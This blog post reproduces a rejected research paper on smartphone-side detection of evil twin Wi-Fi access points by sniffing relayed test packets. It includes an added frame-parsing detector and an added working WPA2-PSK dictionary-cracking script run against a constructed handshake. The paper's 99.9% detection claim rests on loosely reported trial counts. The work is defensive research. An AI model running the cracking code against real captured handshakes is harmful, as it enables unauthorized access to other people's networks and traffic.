This post is a paper I submitted to MobiCom 2014 around the end of my master's course; it was rejected. Since, for various reasons, there will most likely be no follow-up research, I am making it public on the blog.
How can you trust a stranger? This study starts from that question. Your smartphone holds a great deal of important information about you, so how can you be sure that a Wi-Fi network you have never connected to before is safe to use for free internet access? The more prevalent smartphones become, the more important Wi-Fi security is. An evil twin access point tries to capture your information without your permission. This study presents an approach that lets a smartphone detect an evil twin access point without any outside help. We analyze the evil twin access point attack, survey related work, and finally propose a relay-sniffing based evil twin access point detection scheme. The scheme does not rely on third-party authentication, traffic characteristics, dual networks, statistics, or training. Instead, it takes the traditional weakness of wireless networks, that every packet is open to everyone in range, and uses it as the clue for detecting an evil twin access point. In our experiments, the scheme let a smartphone detect the evil twin access point in 99.9% of trials and warn the user.
1. INTRODUCTION
How can you trust a stranger? If you have no information about someone you have just met, you cannot simply relax. But what if, at that moment, the stranger offers you a favor? It is clear that you benefit if you trust the person; nonetheless, you cannot be sure whether the favor is sincere or will harm you. To this question, most people would answer that trusting the stranger requires some reliable third-party certificate, such as a government-issued ID that carries reliable authentication. But if there is none, would you believe that the stranger's favor is genuine?
Now move the opening question to your smartphone. How can you trust an access point (AP) you have never connected to before? It is convenient to use Wi-Fi for internet access instead of cellular networks such as 3G, LTE and LTE-A, and so avoid data charges. But you cannot be sure that the AP providing your Wi-Fi connection is safe. If the AP you connected to is an evil twin AP, every byte you transmit and receive over Wi-Fi can be captured by the attacker, and personal information such as credit card numbers and Facebook or e-mail passwords can be accessed without your permission.
Smartphones have become essential to daily life. People access the internet everywhere, and communicate, shop, study and do business on their phones. Smartphones reach the internet through cellular or Wi-Fi networks. Unlike cellular networks, which charge for data, Wi-Fi usually offers free internet access to authenticated users, and because it is so easy to deploy, many public places such as airports, universities, hotels and coffee shops now offer free Wi-Fi to smartphone users.
A smartphone holds a great deal of important personal information about its user, so the more prevalent smartphones become, the more important Wi-Fi security is. But because smartphone users move around and connect to many different APs, and because, unlike cellular networks, there is no central, uniform filtering system, there is no guarantee that a third-party authentication system such as a Remote Authentication Dial-In User Service (RADIUS) server is in place. Unfortunately, the information available about a new AP is very limited for a user who wants to use a Wi-Fi network securely on first sight.
This study presents an approach by which a smartphone can, without any outside help, detect an evil twin AP that tries to sniff its Wi-Fi communication. The rest of this paper consists of five chapters. Chapter 2 introduces the background of the evil twin AP attack. Chapter 3 surveys related work on evil twin AP detection. Chapter 4 proposes a new evil twin AP detection scheme, which is evaluated in chapter 5. Finally, chapter 6 concludes the study and gives our answer to the opening question.
2. BACKGROUND
2.1. Paradigm Shift of AP Attacks
Before the advent of smartphones, AP attacks were mainly rogue AP attacks. Figure 1 shows a rogue AP attack. Like a backdoor, it undermines the security system through an unauthorized AP installed by an authorized person. At that time the information to be protected was stored mainly on servers, so unauthorized access to those servers through a rogue AP posed a serious risk. The rogue AP attack is therefore categorized as an insider attack, and it is also regarded as a social engineering issue.
With the advent of smartphones, the paradigm of AP attacks shifted. Because the information to be protected is now stored not only on servers but also on smartphones, the main target of AP attacks moved from servers to smartphones.
The victim is no longer fixed in place but mobile, so the attacker has to move as well. The evil twin AP attack is therefore categorized as an outsider attack. Figure 2 shows an evil twin AP attack. In light of the unauthorized AP's illegal action, an evil twin AP can be seen as a rogue AP; the important point is not the name of the attack but the paradigm shift in AP attacks.
2.2. Threat of Evil Twin AP to Smartphones
The evil twin AP attack described above can spoof smartphone users easily. When a smartphone scans for available APs and the user picks one, the AP with the strongest signal is listed first, and the stronger the signal, the more stable the high-speed internet access. An evil twin AP therefore positions itself closer to smartphone users and provides a stronger signal than the legitimate AP to attract them. So even though the evil twin AP attack is an outsider attack, it is not indiscriminate but a targeted attack that selects its victims.
The service set identifier (SSID) is shown to smartphone users as the AP's name. If the evil twin AP uses an SSID the users trust, spoofing them is much easier. For example, if an evil twin AP in a Starbucks coffee shop uses the SSID 'Starbucks', users are unlikely to doubt it.
The evil twin AP also offers the users internet access; otherwise smartphone users would not stay connected to it. It is therefore difficult for a smartphone user to recognize that the AP they connected to is an evil twin and that they have become a target. The attacker can capture and store packets, without the victim's permission, for as long as the victim uses the Wi-Fi. If the packets are encrypted they are better protected, but once stored they may become the target of an offline brute-force attack to decrypt them.
3. RELATED WORKS
3.1. Traffic Analysis Based Detection
The traditional rogue AP detection scheme is the MAC address filtering applied by Cisco. But an attacker can spoof a MAC address, and ways of bypassing MAC address filtering have already been published. Another approach filters packets that enter the wired network from the wireless network through a rogue AP [3-4]. Several schemes based on network traffic analysis have also been published [13-14]. These schemes, however, show some false-positive rate when detecting rogue APs in real network environments, where many factors affect the result. Therefore it cannot be assured that analyzing a few packets or traffic characteristics gives a perfect clue for evil twin AP detection.
3.2. AP Nature Analysis Based Detection
Suman Jana et al. proposed a clock skew based rogue AP detection scheme. Clock skew is a physical property by which every AP can be identified, even APs of the same brand and model. They registered the clock skew of every legitimate AP and then judged each AP seen in the Wi-Fi network by whether it was registered; an AP with an unregistered clock skew is regarded as a rogue AP. This kind of scheme has a training cost: every legitimate AP has to be registered before any AP can be judged rogue. But a real Wi-Fi environment changes frequently; for example, a current smartphone can itself act as both an AP and a supplicant.
3.3. User Side Detection
Somayeh Nikbakhsh et al. proposed a hop count based client-side rogue AP detection scheme. They suggest that if a sent packet traverses an extra hop, there is an evil twin AP performing a man-in-the-middle attack. Their scheme looks sound but has two drawbacks. First, the client must already know the previous hop count in order to notice an increment, which means the scheme has a training cost; smartphone users would pay that cost every time they go to an unfamiliar place and try to access the internet through a Wi-Fi network they have never connected to. Second, even in wired networks, packet routing changes frequently in search of the optimal path, and wireless routing varies even more, so the hop count the smartphone learned in its most recent training can be meaningless. Consequently, hop count based evil twin AP detection is of limited use in real Wi-Fi networks. Jaemin Lee et al. proposed a dual-network user-side evil twin AP detection scheme that uses the 3G and Wi-Fi networks: it compares an untampered certificate received over 3G with the certificate received over Wi-Fi to detect an evil twin AP. This scheme has two drawbacks. First, it relies on the network infrastructure: if the smartphone cannot access both networks simultaneously, the scheme cannot work. Second, it needs a web server that receives the packets the smartphone sends, so it is not pure, independent user-side detection. Chao Yang et al. proposed a user-side evil twin AP detection scheme based on statistical techniques. It does not rely on training, but it cannot eliminate the false-positive rate entirely.
4. PROPOSED SCHEME
In this study we propose a relay-sniffing based evil twin AP detection scheme. The scheme does not rely on third-party authentication, traffic characteristics, statistics, dual networks, or training. Wireless networks are well known to be more vulnerable than wired networks because they use radio as the medium and deliver every transmission to every device within range. Our scheme turns this traditional weakness, that every packet is open to everyone in range, into the clue for detecting an evil twin AP: if a smartphone can sniff the copy of its own packet that the evil twin AP relays, it can detect the evil twin AP without any help. The only thing the smartphone needs is a single packet. Note that this presumes the evil twin forwards the smartphone's traffic over a second wireless link within the smartphone's radio range; a relay over a wired or cellular uplink is never on the air for the smartphone to see. To make the idea clear, let us compare the environment with and without an evil twin AP under the proposed scheme.
Figure 3 shows the proposed scheme during normal Wi-Fi access. First, the smartphone starts monitoring its Wi-Fi environment and sends a test packet. The smartphone can then sniff every packet on the air, including its own test packet. If the AP it is connected to is not an evil twin, the smartphone sees exactly one copy of the test packet, whose sender address is the smartphone's own MAC address and whose receiver address is the AP's MAC address.
Figure 4 shows how the scheme works when Wi-Fi access goes through an evil twin AP. Again the smartphone starts monitoring the surrounding Wi-Fi networks and sends a test packet. The evil twin AP then relays that packet upstream in order to provide the smartphone with internet access. Because the relayed packet also reaches the smartphone, the smartphone sees two copies of its test packet on the monitoring interface. The second copy, relayed by the evil twin AP, shows the AP the smartphone is connected to as its sender rather than the smartphone itself. From this packet the smartphone can tell that it is connected to an evil twin AP; it then disconnects the current Wi-Fi connection and warns the user. Figure 5 shows the procedure of the proposed scheme.
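The detection step of Figures 3 to 5, as an added example that is not the paper's application: a small parser for the three-address 802.11 data header and the relay check run over constructed frames. The MAC addresses, the test-packet marker and the frame bytes are assumptions made for the illustration; a real run would read the frames from the monitor-mode capture. The check also handles two things a capture always contains: the phone's own retransmission of the test packet (retry bit set), which must not count as a relay, and control frames such as the AP's ACK, which carry no payload.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Hypothetical, locally administered MAC addresses for the scenario (not from the paper).
PHONE_MAC = "02:11:22:33:44:55"    # the smartphone's own Wi-Fi interface
EVIL_BSSID = "02:aa:bb:cc:dd:01"   # BSSID the phone associated with (evil twin's AP radio)
EVIL_UPLINK = "02:aa:bb:cc:dd:02"  # evil twin's client radio toward the legitimate AP
LEGIT_BSSID = "02:99:88:77:66:00"  # the legitimate AP
GATEWAY = "02:99:88:77:66:ff"      # destination of the test packet
MARKER = b"ETAP-TEST:"             # constructed payload prefix identifying our test packet


def mac_bytes(mac: str) -> bytes:
    return bytes(int(x, 16) for x in mac.split(":"))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{x:02x}" for x in raw)


@dataclass
class DataFrame:
    to_ds: bool
    from_ds: bool
    retry: bool
    addr1: str      # receiver address
    addr2: str      # transmitter address
    addr3: str      # SA or DA depending on the DS bits
    payload: bytes


def build_data_frame(addr1: str, addr2: str, addr3: str, to_ds: bool,
                     from_ds: bool, payload: bytes, retry: bool = False) -> bytes:
    """Minimal unencrypted, non-QoS 802.11 data frame: FC, duration, addr1-3, sequence control, body."""
    fc0 = 0x08                                              # type 2 (data), subtype 0, version 0
    fc1 = (0x01 if to_ds else 0) | (0x02 if from_ds else 0) | (0x08 if retry else 0)
    return (bytes([fc0, fc1]) + b"\x00\x00" + mac_bytes(addr1) + mac_bytes(addr2)
            + mac_bytes(addr3) + b"\x00\x00" + payload)


def build_ack(receiver: str) -> bytes:
    """802.11 ACK control frame (type 1, subtype 13): FC, duration, RA. No payload, no transmitter."""
    return bytes([0xD4, 0x00]) + b"\x00\x00" + mac_bytes(receiver)


def parse_data_frame(frame: bytes) -> Optional[DataFrame]:
    """Header fields of a data frame; None for management/control/4-address frames and runts."""
    if len(frame) < 24:
        return None
    fc0, fc1 = frame[0], frame[1]
    if (fc0 >> 2) & 0x03 != 2:                              # not a data frame
        return None
    to_ds, from_ds = bool(fc1 & 0x01), bool(fc1 & 0x02)
    if to_ds and from_ds:                                   # WDS frame with a 4th address: out of scope
        return None
    hdr_len = 26 if fc0 & 0x80 else 24                      # QoS data subtypes add a 2-byte QoS control field
    if len(frame) < hdr_len:
        return None
    return DataFrame(to_ds, from_ds, bool(fc1 & 0x08),
                     mac_str(frame[4:10]), mac_str(frame[10:16]), mac_str(frame[16:22]),
                     frame[hdr_len:])


def detect_relay(frames: List[bytes], own_mac: str, nonce: bytes) -> Tuple[bool, List[str]]:
    """Relay-sniffing check from the paper: every copy of our test packet on the air should have
    been transmitted by us. A copy transmitted by any other station is the AP forwarding it over a
    second wireless link, i.e. the evil twin signature. Returns (evil_twin, relaying transmitters)."""
    own_copies, relayed_by = 0, []
    for raw in frames:
        f = parse_data_frame(raw)
        if f is None or not f.payload.startswith(MARKER + nonce):
            continue                                        # other traffic, or an encrypted body we cannot match
        if f.addr2.lower() == own_mac.lower():
            own_copies += 1                                 # our transmission or our own retry: not a relay
        else:
            relayed_by.append(f.addr2)
    if own_copies == 0:
        raise RuntimeError("test packet never seen: the monitor capture is incomplete")
    return (bool(relayed_by), relayed_by)


def scenario_frames(evil_twin: bool, nonce: bytes) -> List[bytes]:
    """Constructed capture: the phone's test packet, the AP's ACK, the phone's own retry and,
    in the evil twin case, the copy the evil twin's uplink radio sends to the legitimate AP."""
    bssid = EVIL_BSSID if evil_twin else LEGIT_BSSID
    payload = MARKER + nonce
    frames = [build_data_frame(bssid, PHONE_MAC, GATEWAY, True, False, payload),
              build_ack(PHONE_MAC),
              build_data_frame(bssid, PHONE_MAC, GATEWAY, True, False, payload, retry=True)]
    if evil_twin:
        frames.append(build_data_frame(LEGIT_BSSID, EVIL_UPLINK, GATEWAY, True, False, payload))
    return frames


if __name__ == "__main__":
    for case in (False, True):
        print("evil twin" if case else "normal AP",
              detect_relay(scenario_frames(case, b"7f3a"), PHONE_MAC, b"7f3a"))
```

The per-test nonce in the payload is what lets the phone tell its own packet apart from any other station's traffic, and matching on the transmitter address (addr2) rather than the IP header means a NAT on the evil twin does not hide the relay. When the link between the evil twin and the legitimate AP is encrypted, the payload match fails and the relayed copy is invisible to this check, which is exactly the limitation discussed in chapter 6.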
5. EVALUATION
We built an Android application implementing the proposed scheme to evaluate it in a real Wi-Fi environment. The source code of the application can be downloaded from http://www.(veiled until notification due to double-blind review).net. Although the scheme does not need it, we also uploaded the source code of a server-side program that lets us confirm whether the smartphone actually sent the test packet. The procedure for building an evil twin AP has been published previously.
We used a Samsung Galaxy S3 (manufacturer model SHVE201S) running Android 4.3; a TG NXI-L7000 laptop running BackTrack R5 Linux as the evil twin AP, with two Next-201N mini USB WLAN cards using the Realtek 8188CUS chipset; and a desktop with an IPtime N150UA_Solo USB WLAN card using the Ralink 3070 chipset as the legitimate AP.
We wanted to evaluate the scheme with only one smartphone, but we faced an obstacle during implementation. Switching the smartphone's Wi-Fi interface from managed mode to monitor mode has been demonstrated, but it requires root permission on the smartphone, and in several countries including the U.S., rooting or jailbreaking a smartphone is illegal in some cases. We therefore used one more laptop to do the Wi-Fi monitoring, which the scheme itself does not need.
Figure 6 shows the application implementing the scheme. Touching the "WiFi Scan OFF" toggle button makes the smartphone repeatedly scan for candidate APs nearby. Touching the "WiFi Scan On" toggle button again freezes the candidate AP list, as in Figure 7. You can then select the AP to test by touching the "AP test" button to the right of its SSID. The application changes the connection and sends the test packet automatically, as in Figure 8, and that test packet is captured by the laptop in monitor mode. As mentioned above, the smartphone itself could take the monitoring role, but in this evaluation we copied the packet capture (PCAP) file from the monitoring laptop to the smartphone manually to avoid rooting it. The smartphone then analyzes the capture: touching the "Detect Evil Twin Access Points" button at the bottom shows, as in Figure 9, whether the tested AP is an evil twin according to the scheme.
We evaluated the scheme with this application several hundred times, and it failed to detect the evil twin AP only once. Retransmissions due to signal loss happen occasionally in wireless networks, so monitor mode does not guarantee that every packet is captured. Still, the scheme let the smartphone detect the evil twin AP 99.9% of the time and warn the user. Because, as mentioned, the attacker tends to move closer to the victims to lure them with a stronger signal than the legitimate AP's, we believe the scheme will achieve a similarly near-perfect detection rate in a real attack.
6. CONCLUSION
In the preamble of this paper we asked how you can trust a stranger. Our answer is: never. But when we could benefit from trusting someone, we change the question to how you can doubt a stranger, and then the answer is simple: if someone shows suspicious behavior, we cannot trust them.
We surveyed the published work on evil twin AP detection and analyzed its limitations, and then proposed a relay-sniffing based evil twin AP detection scheme. The scheme is simple but powerful and does not rely on third-party authentication, traffic characteristics, dual networks, training, or statistics. In our evaluation it let a smartphone detect the evil twin AP 99.9% of the time and warn the user, and in our opinion it can achieve a similarly near-perfect detection rate in a real attack.
Last but not least, we address three limitations of the scheme. First, as mentioned in chapter 5, the scheme needs root permission to put the Wi-Fi interface into monitor mode, so it should be implemented by smartphone manufacturers or smartphone OS developers to avoid the legal (intellectual property) conflicts around rooting. Second, a legitimate Wi-Fi repeater behaves just like an evil twin AP: it relays the smartphone user's data to another AP, so the scheme may judge it to be an evil twin. The final decision should therefore be left to the user; the ultimate goal of the scheme is to give the user a serious warning, not to block all wireless relaying. Third, if the scheme is implemented naively, a smartphone may fail to detect an evil twin AP when a security protocol such as IEEE 802.11i encrypts the link between the evil twin AP and the legitimate AP. Figure 10 illustrates this environment.
As Figure 10 shows, a naive implementation may miss the evil twin AP in this case because the smartphone cannot find its test packet in the encrypted communication between the evil twin AP and the legitimate AP. This limitation can actually be regarded as a social engineering problem, because the evil twin AP is an authorized client of the legitimate AP.
In our opinion, though, once those packets are captured and stored on the smartphone, they could be decrypted by an offline dictionary attack with tools such as Aircrack-ng or coWPAtty, or by a known-plaintext attack. All the smartphone additionally needs to extend the scheme in this way is a large enough dictionary and enough computing power. We therefore suggest that smartphone manufacturers and OS developers consider this in the light of proactive, offensive wireless security.
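What the offline dictionary attack just mentioned actually computes, as an added example that is neither the paper's code nor Aircrack-ng or coWPAtty: the WPA2-PSK key derivation of IEEE 802.11i (PBKDF2 from passphrase and SSID to the PMK, PRF-512 to the PTK) and the HMAC-SHA1 MIC over message 2 of the 4-way handshake, tried against a list of candidate passphrases. The SSID, passphrase, addresses, nonces, dictionary and EAPOL-Key frame below are constructed for the illustration; a real run takes the nonces and the MIC from a captured handshake. The second case shows the caveat a practitioner should keep in mind: a passphrase that is not in the dictionary is not recovered, and an 802.1X/EAP link between the two APs has no passphrase to guess at all.

```python
import hashlib
import hmac
from typing import Iterable, Optional

MIC_OFFSET = 81  # 802.1X header (4) + descriptor type (1) + key info (2) + key length (2)
                 # + replay counter (8) + key nonce (32) + key IV (16) + key RSC (8) + key ID (8)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||
    min(ANonce,SNonce)||max(ANonce,SNonce)). The KCK that keys the MIC is the first 16 bytes."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def eapol_key_msg2(snonce: bytes, key_data: bytes) -> bytes:
    """EAPOL-Key message 2 of the 4-way handshake with the MIC field zeroed (RSN descriptor, CCMP)."""
    body = (b"\x02"                                  # descriptor type: RSN
            + b"\x01\x0a"                            # key info: version 2 (HMAC-SHA1 MIC), pairwise, MIC bit
            + b"\x00\x10"                            # key length: 16 (CCMP)
            + (1).to_bytes(8, "big")                 # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)   # key nonce, IV, RSC, ID
            + bytes(16)                              # MIC placeholder
            + len(key_data).to_bytes(2, "big") + key_data)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # 802.1X: version 1, type EAPOL-Key


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2: MIC = HMAC-SHA1(KCK, EAPOL frame with the MIC field zeroed)[:16]."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def sign_msg2(frame: bytes, kck: bytes) -> bytes:
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def dictionary_attack(ssid: str, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes,
                      captured_msg2: bytes, candidates: Iterable[str]) -> Optional[str]:
    """Try each candidate passphrase until one reproduces the captured MIC; None if the list is exhausted."""
    captured_mic = captured_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for passphrase in candidates:
        kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, captured_msg2), captured_mic):
            return passphrase
    return None


# Constructed handshake between the legitimate AP (authenticator) and the evil twin's uplink radio (supplicant).
SSID = "Starbucks"
AA = bytes.fromhex("029988776600")      # authenticator (legitimate AP) address, hypothetical
SPA = bytes.fromhex("02aabbccdd02")     # supplicant (evil twin uplink) address, hypothetical
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
DICTIONARY = ["password", "starbucks1", "coffee2014", "letmein"]


def captured_handshake(passphrase: str) -> bytes:
    """Message 2 as the supplicant would send it for the given passphrase (what a sniffer records)."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return sign_msg2(eapol_key_msg2(SNONCE, b""), kck)


def run_attack(true_passphrase: str) -> Optional[str]:
    return dictionary_attack(SSID, AA, SPA, ANONCE, SNONCE, captured_handshake(true_passphrase), DICTIONARY)


if __name__ == "__main__":
    print(run_attack("coffee2014"))            # weak PSK present in the list: recovered
    print(run_attack("Tq9#vL2m!xR4pZ8w"))      # strong PSK absent from the list: None
```

The cost per candidate is dominated by the 4096 PBKDF2 iterations, which is why the tools the paper names precompute PMKs per SSID; on a phone, the dictionary size the passage calls for translates directly into CPU time and battery.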
REFERENCES
Minwoo Park et al., "Dangerous Wi-Fi access point: attacks to benign smartphone applications", Personal and Ubiquitous Computing, Oct. 2013.
Sungmin Lee et al., "A mitigation scheme of DoS attacks against IEEE 802.11i using dynamic MAC address", International Conference on Electrical Engineering & Computer Science, Dec. 2013.
Lanier Watkins et al., "A Passive Approach to Rogue Access Point Detection", IEEE GLOBECOM, 2007.
Raheem Beyah et al., "Rogue-Access-Point Detection: Challenges, Solutions, and Future Directions", IEEE Security & Privacy, Vol. 9, No. 5, Sept. 2011, pp. 56-61.
Somayeh Nikbakhsh et al., "A Novel Approach for Rogue Access Point Detection on the Client-Side", International Conference on Advanced Information Networking and Applications Workshops, 2012.
Suman Jana et al., "On Fast and Accurate Detection of Unauthorized Wireless Access Points Using Clock Skews", IEEE Transactions on Mobile Computing, Vol. 9, No. 3, Mar. 2010, pp. 449-462.
Vivek Ramachandran, "BackTrack 5 Wireless Penetration Testing Beginner's Guide", Packt Publishing, 2011.
Kevin Benton, "The Evolution of 802.11 Wireless Security", UNLV Informatics, Apr. 2010.
Jaemin Lee et al., "Man-in-the-middle Attacks Detection Scheme on Smartphone using 3G network", IARIA, 2012.
Chao Yang et al., "Active User-Side Evil Twin Access Point Detection Using Statistical Techniques", IEEE Transactions on Information Forensics and Security, Vol. 7, No. 5, Oct. 2012.
Omri Ildis et al., bcmon, http://bcmon.blogspot.kr
Richi Jennings, "Jailbreak or unlock hacks of iPhone to be ILLEGAL under Obama's TPP treaty", Computerworld, Nov. 19, 2013.
Raheem Beyah et al., "Rogue Access Point Detection using Temporal Traffic Characteristics", IEEE GLOBECOM, Nov. 2004.
Hao Han et al., "A Measurement Based Rogue AP Detection Scheme", IEEE INFOCOM, Apr. 2009.